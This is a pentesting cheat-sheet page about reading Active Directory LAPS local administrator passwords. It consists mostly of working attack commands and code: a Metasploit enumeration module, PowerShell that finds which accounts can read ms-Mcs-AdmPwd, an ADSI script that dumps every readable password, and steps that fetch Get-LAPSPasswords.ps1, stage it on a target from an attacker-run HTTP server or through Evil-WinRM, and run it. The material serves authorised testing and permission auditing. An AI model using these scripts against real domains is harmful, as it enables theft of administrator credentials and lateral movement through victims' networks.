# LAPS (Local Administrator Password Solution) Pentesting

LAPS manages the local administrator password of domain-joined computers: each machine sets a random password on a schedule and writes it, in clear text, to its own computer object in Active Directory in the **ms-Mcs-AdmPwd** attribute, with the rotation deadline in **ms-Mcs-AdmPwdExpirationTime**. The attribute is marked confidential, so only principals explicitly delegated read access (plus those with full control, such as Domain Admins) can read it. From an attacker's point of view, LAPS is therefore an access-control question: find an account with read rights on the attribute and the local admin passwords follow.

### Enumeration <a href="#enumeration" id="enumeration"></a>

```
msfconsole
use post/windows/gather/credentials/enum_laps
set session 2
exploit
```

### Obtain Administrator's Password <a href="#obtain-administrators-password" id="obtain-administrators-password"></a>

First, check whether your account is in the group that has been delegated read access to the LAPS password attribute. **LAPS\_Readers** is a common choice of name, not a built-in group; the administrator picks it. For a domain account, query the domain rather than the local SAM:

```
net user <current-username> /domain
# Global Group memberships  *LAPS_Readers
```
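Group names are only a hint; the authoritative answer is the ACL on the OU that holds the computers. The following PowerShell is an added example for this page (not code from the original or from the LAPS project): it resolves the forest-specific schema GUID of **ms-Mcs-AdmPwd** and lists every principal whose ACE grants the rights needed to read a confidential attribute. It assumes the RSAT ActiveDirectory module is available, and the OU distinguished name used at the bottom is a placeholder.

```powershell
# Added example, not from the original page: instead of guessing at a group name,
# read the OU's ACL and list which principals can actually read ms-Mcs-AdmPwd.
# Assumes the RSAT ActiveDirectory module; the OU DN passed in is an assumption.
Import-Module ActiveDirectory

function Get-LapsReaders {
    param(
        [Parameter(Mandatory)] [string] $OU   # e.g. 'OU=Workstations,DC=corp,DC=local' (placeholder)
    )

    # ms-Mcs-AdmPwd is a schema extension, so its schemaIDGUID differs per forest;
    # resolve it instead of hard-coding a value.
    $schemaNC = (Get-ADRootDSE).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=ms-Mcs-AdmPwd)' -Properties schemaIDGUID
    if (-not $attr) { throw 'ms-Mcs-AdmPwd is not in the schema: LAPS is not installed in this forest.' }
    $admPwdGuid = [guid]$attr.schemaIDGUID
    $allAttrs   = [guid]'00000000-0000-0000-0000-000000000000'   # ACE that applies to every attribute

    # Reading a confidential attribute needs ReadProperty plus the CONTROL_ACCESS
    # extended right (this is exactly what Set-AdmPwdReadPasswordPermission grants);
    # GenericAll implies both. An ACE with an empty ObjectType covers all attributes.
    (Get-Acl -Path "AD:\$OU").Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            ($_.ObjectType -eq $admPwdGuid -or $_.ObjectType -eq $allAttrs) -and
            ($_.ActiveDirectoryRights -match 'ExtendedRight|GenericAll')
        } |
        Select-Object IdentityReference, ActiveDirectoryRights, IsInherited
}

# Usage; the OU value is a placeholder for this example.
Get-LapsReaders -OU 'OU=Workstations,DC=corp,DC=local' | Format-Table -AutoSize
```

Any identity listed here, or any group nested inside one, is a valid target for pulling LAPS passwords, whatever it happens to be called. A plain ReadProperty ACE is deliberately not matched: without the extended right it cannot read a confidential attribute.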

#### Using Get-ADComputer <a href="#using-get-adcomputer" id="using-get-adcomputer"></a>

**Get-ADComputer** (RSAT ActiveDirectory module) reads the computer object. Ask for the LAPS attributes explicitly, since they are not returned by default. If your account lacks read rights on the attribute, **ms-Mcs-AdmPwd** comes back empty rather than raising an error, so an empty result is not proof that LAPS is absent.

```
Get-ADComputer -Identity '<active-directory-computer-name>' -Properties 'ms-Mcs-AdmPwd','ms-Mcs-AdmPwdExpirationTime'
```
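The RSAT module is often not installed on a compromised workstation. The following PowerShell is an added example for this page (not code from the original) that does the same job through System.DirectoryServices, which is present on every domain-joined Windows host, and goes one step further than the single-computer query above: it dumps every computer whose password the current account can read. It relies on the fact that the domain controller evaluates the LDAP filter `(ms-Mcs-AdmPwd=*)` against the caller's rights, so computers whose password you cannot read simply fail to match. No assumed names beyond the helper function itself.

```powershell
# Added example, not from the original page: list every computer whose LAPS
# password the current user can read, without the RSAT ActiveDirectory module.
# The DC applies the caller's rights when evaluating (ms-Mcs-AdmPwd=*), so
# unreadable passwords yield no match rather than an error.
function Get-ReadableLapsPasswords {
    $searcher = [adsisearcher]'(&(objectCategory=computer)(ms-Mcs-AdmPwd=*))'
    $searcher.PageSize = 1000   # page through large domains instead of hitting the size limit
    [void]$searcher.PropertiesToLoad.AddRange(@('name', 'dNSHostName', 'ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime'))

    # DirectorySearcher keys property names in lowercase; a missing property is an empty collection.
    $first = { param($props, $name) if ($props[$name].Count) { $props[$name][0] } }

    foreach ($result in $searcher.FindAll()) {
        $p = $result.Properties
        $rawExp = & $first $p 'ms-mcs-admpwdexpirationtime'
        # The expiration is a FILETIME: 100-ns ticks since 1601-01-01 UTC, stored as Int64.
        $exp = if ($rawExp) { [datetime]::FromFileTimeUtc([int64]$rawExp) }

        [pscustomobject]@{
            Computer   = & $first $p 'name'
            DnsName    = & $first $p 'dnshostname'
            AdminPwd   = & $first $p 'ms-mcs-admpwd'
            ExpiresUtc = $exp
            # An expired entry means the machine has not checked in to rotate: the password
            # may still be valid, but the host is likely offline or broken.
            Expired    = if ($exp) { $exp -lt [datetime]::UtcNow } else { $null }
        }
    }
}

Get-ReadableLapsPasswords | Format-Table -AutoSize
```

Running this as several different compromised users is a quick way to map which accounts have LAPS read rights without touching the ACLs at all.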

#### Using Get-LAPSPasswords.ps1 <a href="#using-get-lapspasswordsps1" id="using-get-lapspasswordsps1"></a>

1. **Download the Payload in Local Machine**

   If you are in the delegated reader group, you can get the administrator's password using [**Get-LAPSPasswords.ps1**](https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1). Fetch the raw file, not the GitHub page that renders it:

   ```
   wget https://raw.githubusercontent.com/kfosaaen/Get-LAPSPasswords/master/Get-LAPSPasswords.ps1
   ```
2. **Transfer the Payload to Target Machine**
   * **via PowerShell**

     First, start a web server on the local machine from the directory that holds the script.

     ```
     python3 -m http.server 8000
     ```

     Then fetch it on the target. In Windows PowerShell `curl` is only an alias for **Invoke-WebRequest**, so use the cmdlet explicitly to avoid surprises.

     ```
     Invoke-WebRequest -Uri http://<local-ip>:8000/Get-LAPSPasswords.ps1 -OutFile .\Get-LAPSPasswords.ps1
     ```
   * **via Evil-WinRM**

     If you connect to the remote Windows machine with Evil-WinRM, pass the local directory that holds the script with the **-s** flag. Scripts in that directory can then be loaded into the remote session by typing their file name at the prompt (e.g. `Get-LAPSPasswords.ps1`), without writing anything to disk on the target.

     ```
     evil-winrm -i <target-ip> -u username -p password -s /path/to/current/directory
     ```

     Alternatively, copy the script to the target with the built-in **upload** command, which does not need **-s**.

     ```
     PS > upload .\Get-LAPSPasswords.ps1 c:\Users\<username>\Desktop\Get-LAPSPasswords.ps1
     ```
3. **Execute the Payload in Target Machine**

   The script only defines the **Get-LAPSPasswords** function; running the file on its own produces no output. Dot-source it, then call the function (it also accepts **-DomainController** and **-Credential** for use from a non-domain context).

   ```
   . .\Get-LAPSPasswords.ps1
   Get-LAPSPasswords | Format-Table -AutoSize
   ```
